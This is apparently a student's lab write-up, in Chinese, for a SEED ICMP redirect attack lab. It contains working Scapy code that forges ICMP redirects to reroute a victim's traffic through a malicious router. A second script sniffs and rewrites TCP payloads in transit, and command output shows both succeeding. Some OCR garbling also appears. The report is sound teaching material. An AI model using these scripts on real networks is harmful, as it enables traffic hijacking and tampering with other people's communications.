# **ICMP Recirect Attack Lab**

57118135 许皓钦

### Task1

代码. 如下。

首先补全所给代码,如下。

```
1#!/usr/bin/python3
 2 from scapy.all import *
 3 ip = IP(src = "10.9.0.11", dst = "10.9.0.5")
 4 icmp = ICMP(type=5, code=1)
 5 \text{ icmp.gw} = "10.9.0.111"
 6# The enclosed IP packet should be the one that
 7# triggers the redirect message.
 8 \text{ ip2} = IP(\text{src} = "10.9.0.5", dst = "192.168.60.5")
 9 send(ip/icmp/ip2/ICMP());
在未运行之前先在 10.9.0.5 上 ping 一下 192.168.60.5,如下
root@9d1c1c191caa:/# ping 192.168.60.5
PING 192.168.60.5 (192.168.60.5) 56(84) bytes of data.
64 bytes from 192.168.60.5: icmp seq=1 ttl=63 time=0.168 ms
64 bytes from 192.168.60.5: icmp seq=2 ttl=63 time=0.245 ms
64 bytes from 192.168.60.5: icmp seq=3 ttl=63 time=0.154 ms
64 bytes from 192.168.60.5: icmp seq=4 ttl=63 time=0.144 ms
64 bytes from 192.168.60.5: icmp seq=5 ttl=63 time=0.178 ms
64 hvtos from 100 168 60 5: icmn son=6 ttl=63 timo=0 174 ms
然后看一下 cache,发现是从 10.9.0.11 直接过去的,如下。
root@9d1c1c191caa:/# ip route show cache
192.168.60.5 via 10.9.0.11 dev eth0
    cache
清空一下 cache. 如下。
root@9d1c1c191caa:/# ip route flush cache
root@9d1c1c191caa:/# ip route show cache
root@9d1c1c191caa:/#
接着再在 10.9.0.5 上 ping 一下 192.168.60.5,然后在攻击方运行所给
```

root@VM:/home/seed/Desktop/Labs\_20.04/Network Security/ICMP Redirable Lab/Labsetup/volumes# python3 task1.py
.
Sent 1 packets.

然后再看一下 cache. 发现是通过 10.9.0.111 过去的。

root@9d1c1c191caa:/# ip route show cache 192.168.60.5 via 10.9.0.111 dev eth0 cache <redirected> expires 291sec root@9d1c1c191caa:/# ■

看一下他的路径,发现新增了第一跳,攻击成功。

My traceroute [v0.93]											
9d	1c1c	:191caa	(10.9.0.5)			2	021-07	-12T1	0:55:38	3+0000	
Ke	ys:	<b>H</b> elp	<b>D</b> isplay mode	<b>R</b> estart	stati	stics	<b>0</b> rder	of f	ields	<b>q</b> uit	
				Pack	Packets			Pings			
H	ost			Loss%	Snt	Last	Avg	Best	Wrst	StDev	
1	. 10	.9.0.1	11	0.0%	5	0.2	0.2	0.2	0.5	0.1	
2	. 10	.9.0.13	L	0.0%	4	0.2	0.3	0.2	0.4	0.1	
3	. 19	2.168.6	50.5	0.0%	4	0.4	0.3	0.2	0.4	0.1	

#### O1: 不可以重定向外网地址。

将 icmp.gw 改成外网地址,如下。

```
1 #!/usr/bin/python3
2 from scapy.all import *
3 ip = IP(src = "10.9.0.11", dst = "10.9.0.5")
4 icmp = ICMP(type=5, code=1)
5 icmp.gw = "1.2.3.4"
6 # The enclosed IP packet should be the one that
7 # triggers the redirect message.
8 ip2 = IP(src = "10.9.0.5", dst = "192.168.60.5")
9 send(ip/icmp/ip2/ICMP());
```

清空一下 cache,如下。

```
root@9d1c1c191caa:/# ip route flush cache
root@9d1c1c191caa:/# ip route show cache
root@9d1c1c191caa:/#
```

重复上述攻击步骤后,再看一下 cache, 发现攻击失败。

```
root@9d1c1c191caa:/# ip route show cache
192.168.60.5 via 10.9.0.11 dev eth0
    cache
root@9d1c1c191caa:/#
```

### Q2: 不可以重定向内网不存在地址。

将 icmp.gw 改成内网不存在地址,如下。

```
1 #!/usr/bin/python3
2 from scapy.all import *
3 \text{ ip} = IP(\text{src} = "10.9.0.11", dst = "10.9.0.5")
4 icmp = ICMP(type=5, code=1)
5 icmp.gw = "10.9.0.222"
6 # The enclosed IP packet should be the one that
7 # triggers the redirect message.
8 ip2 = IP(src = "10.9.0.5", dst = "192.168.60.5")
9 send(ip/icmp/ip2/ICMP());
重复上述步骤,再看一下 cache... 发现也攻击失败,如下。
root@9d1c1c191caa:/# ip route flush cache
root@9d1c1c191caa:/# ip route show cache
root@9d1c1c191caa:/# ping 192.168.60.5
PING 192.168.60.5 (192.168.60.5) 56(84) bytes of data.
64 bytes from 192.168.60.5: icmp seq=1 ttl=63 time=0.064 ms
64 bytes from 192.168.60.5: icmp seq=2 ttl=63 time=0.079 ms
64 bytes from 192.168.60.5: icmp_seq=3 ttl=63 time=0.082 ms
64 bytes from 192.168.60.5: icmp seq=4 ttl=63 time=0.058 ms
64 bytes from 192.168.60.5: icmp seq=5 ttl=63 time=0.069 ms
64 bytes from 192.168.60.5: icmp seq=6 ttl=63 time=0.055 ms
^C
--- 192.168.60.5 ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5081ms
rtt min/avg/max/mdev = 0.055/0.067/0.082/0.010 ms
root@9d1c1c191caa:/# ip route show cache
192.168.60.5 via 10.9.0.11 dev eth0
root@9d1c1c191caa:/#
```

### Q3:参数置1表示不允许随意修改路由。

将 icmp.gw 改回来,同时将下图所示参数置 1,如下。

攻击依然失败,如下。

```
root@9f4ac6466793:/# ip route show cache
root@9f4ac6466793:/# ping 192.168.60.5
PING 192.168.60.5 (192.168.60.5) 56(84) bytes of data.
64 bytes from 192.168.60.5: icmp seq=1 ttl=63 time=0.106 ms
64 bytes from 192.168.60.5: icmp_seq=2 ttl=63 time=0.083 ms
64 bytes from 192.168.60.5: icmp seq=3 ttl=63 time=0.062 ms
64 bytes from 192.168.60.5: icmp seq=4 ttl=63 time=0.060 ms
64 bytes from 192.168.60.5: icmp seq=5 ttl=63 time=0.097 ms
From 10.9.0.111: icmp seq=6 Redirect Host(New nexthop: 10.9.0.11)
64 bytes from 192.168.60.5: icmp_seq=6 ttl=63 time=0.080 ms
64 bytes from 192.168.60.5: icmp seq=7 ttl=63 time=0.083 ms
^C
--- 192.168.60.5 ping statistics ---
7 packets transmitted, 7 received, 0% packet loss, time 6122ms
rtt min/avg/max/mdev = 0.060/0.081/0.106/0.015 ms
root@9f4ac6466793:/# ip route show cache
192.168.60.5 via 10.9.0.11 dev eth0
    cache <redirected> expires 291sec
root@9f4ac6466793:/#
```

### Task2

补全代码, 功能是将自己的名字改成同等长度的 A 字符串, 如下。

```
1 #!/usr/bin/env python3
 2 from scapy.all import *
 3 def spoof_pkt(pkt):
          newpkt = IP(bytes(pkt[IP]))
          del(newpkt.chksum)
         del(newpkt[TCP].payload)
 7
          del(newpkt[TCP].chksum)
          if pkt[TCP].payload:
                  data = pkt[TCP].payload.load
10
                  print("*** %s, length: %d" % (data, len(data)))
11
                  # Replace a pattern
                  newdata = data.replace(b'hongjie', b'AAAAAAA')
12
13
                  send(newpkt/newdata)
14
          else:
                  send(newpkt)
16 f = 'tcp'
17 pkt = sniff(iface='eth0', filter=f, prn=spoof pkt)
```

到恶意路由下面,将 IP 转发关掉,如下。

root@550de23793fd:/# sysctl net.ipv4.ip\_forward=0
net.ipv4.ip forward = 0

首先, 到 192.168.60.5 下面, 使用如下命令, 开启 netcat 服务器。

O4: 方向为从 10.9.0.5 到 192.168.60.5, 因为代码功能是要 修改受害者发向其他地址的包。

使用 Task1 的方法进行重定向,如下,重定向成功。

root@63d53fc522ec:/# ip route show cache 192.168.60.5 via 10.9.0.111 dev eth0 cache <redirected> expires 293sec

在 10.9.0.111, 也就是恶意路由上运行代码, 得到的响应如下图。

root@550de23793fd:/volumes# python3 task2.py Sent 1 packets. Sent 1 packets. Sent 1 packets. Sent 1 nackets

到 10.9.0.5 上发一串携带自己的名字的字符串,如下。

root@63d53fc522ec:/# nc 192.168.60.5 9090 hongjie123

此时恶意路由 10.9.0.111 的响应如下。

```
.
Sent 1 packets.
*** b'AAAAAAA123\n', length: 11
.
Sent 1 packets
```

在 192.168.60.5 上, 发现发过来的消息中自己的名字成功被改为 A'字符串. 如下

```
root@2cbf746d47fd:/# nc -lp 9090
AAAAAAA123
```

Q5: 使用 mac 地址,恶意路由上只能看到一个包。使用 IP 地址时恶意路由上可以看到不断的包。使用 mac 地址应该更好一点。

首先看一下 10.9.0.5 的 mac 地址, 如下。

修改过滤条件,如下。

```
1 #!/usr/bin/env python3
2 from scapy.all import *
3 def spoof pkt(pkt):
          newpkt = IP(bytes(pkt[IP]))
5
          del(newpkt.chksum)
6
          del(newpkt[TCP].payload)
7
          del(newpkt[TCP].chksum)
8
          if pkt[TCP].payload:
9
                  data = pkt[TCP].payload.load
10
                  print("*** %s, length: %d" % (data, len(data)))
11
                  # Replace a pattern
                  newdata = data.replace(b'hongjie', b'AAAAAAA')
12
13
                  send(newpkt/newdata)
14
          else:
                  send(newpkt)
16 f = 'tcp and ether src host 02:42:0a:09:00:05'
17 pkt = sniff(iface='eth0', filter=f, prn=spoof pkt)
```

到 10.9.0.5 上发一串携带自己的名字的字符串,如下。

root@63d53fc522ec:/# nc 192.168.60.5 9090 hongjie123

在 192.168.60.5 上, 发现发过来的消息中自己的名字成功被改为 A'字符串, 如下。

# root@2cbf746d47fd:/# nc -lp 9090 AAAAAAA123

同时, 恶意路由下的响应只有一个包, 如下。

^Croot@550de23793fd:/volumes# python3 task2.py
\*\*\* b'hongjie123\n', length: 11
.
Sent 1 packets.